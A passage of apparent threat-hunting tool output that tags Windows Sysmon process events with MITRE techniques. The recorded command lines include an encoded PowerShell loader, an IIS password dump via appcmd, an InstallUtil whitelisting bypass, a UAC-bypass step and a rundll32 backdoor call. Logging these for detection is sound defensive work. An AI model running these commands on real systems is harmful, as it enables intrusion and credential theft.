<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-11-26T17:38:11.175869Z"">
</TimeCreated>
<EventRecordID>2362770</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5900"" ThreadID=""6484"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-11-26 17:38:11.175</Data>
<Data Name=""ProcessGuid"">00247C92-E803-5FBF-0000-0010F2BFB40C</Data>
<Data Name=""ProcessId"">16980</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-3404-5FBE-0000-0020E0C90600</Data>
<Data Name=""LogonId"">0x6c9e0</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-E803-5FBF-0000-0010CDB9B40C</Data>
<Data Name=""ParentProcessId"">17336</Data>
<Data Name=""ParentImage"">C:\Windows\System32\taskhostw.exe</Data>
<Data Name=""ParentCommandLine"">taskhostw.exe $(Arg0)</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-15T07:22:05.691759Z"">
</TimeCreated>
<EventRecordID>7681</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-15 07:22:05.660</Data>
<Data Name=""ProcessGuid"">365ABB72-9C9D-5D04-0000-001039CE1600</Data>
<Data Name=""ProcessId"">172</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.8.7600.16385</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
<Data Name=""LogonId"">0x135a4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983</Data>
<Data Name=""ParentProcessGuid"">365ABB72-9C8E-5D04-0000-0010D0421600</Data>
<Data Name=""ParentProcessId"">540</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:13.214691Z"">
</TimeCreated>
<EventRecordID>4900</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:13.169</Data>
<Data Name=""ProcessGuid"">747F3D96-6619-5D3F-0000-0010FDE78600</Data>
<Data Name=""ProcessId"">5116</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.964573Z"">
</TimeCreated>
<EventRecordID>5973</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.924</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001072D7FF00</Data>
<Data Name=""ProcessId"">3640</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T13:50:29.459513Z"">
</TimeCreated>
<EventRecordID>5523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 13:50:28.662</Data>
<Data Name=""ProcessGuid"">747F3D96-9124-5D45-0000-00103B986101</Data>
<Data Name=""ProcessId"">6236</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9124-5D45-0000-001022926101</Data>
<Data Name=""ParentProcessId"">3180</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Local\Temp\fubuki.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T11:23:18.694577Z"">
</TimeCreated>
<EventRecordID>5407</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 11:23:17.636</Data>
<Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-001032CCE100</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-00107AC9E100</Data>
<Data Name=""ParentProcessId"">932</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:38.290374Z"">
</TimeCreated>
<EventRecordID>6170</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:38.270</Data>
<Data Name=""ProcessGuid"">365ABB72-FE66-5CEB-0000-0010C7F80B00</Data>
<Data Name=""ProcessId"">1168</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami /groups </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE66-5CEB-0000-001058F50B00</Data>
<Data Name=""ParentProcessId"">3256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c whoami /groups </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:15.303423Z"">
</TimeCreated>
<EventRecordID>557006</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:15.285</Data>
<Data Name=""ProcessGuid"">747F3D96-183B-610F-0000-0010DC6CD400</Data>
<Data Name=""ProcessId"">11324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f &amp;&amp; REM \system32\AppHostRegistrationVerifier.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1108</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
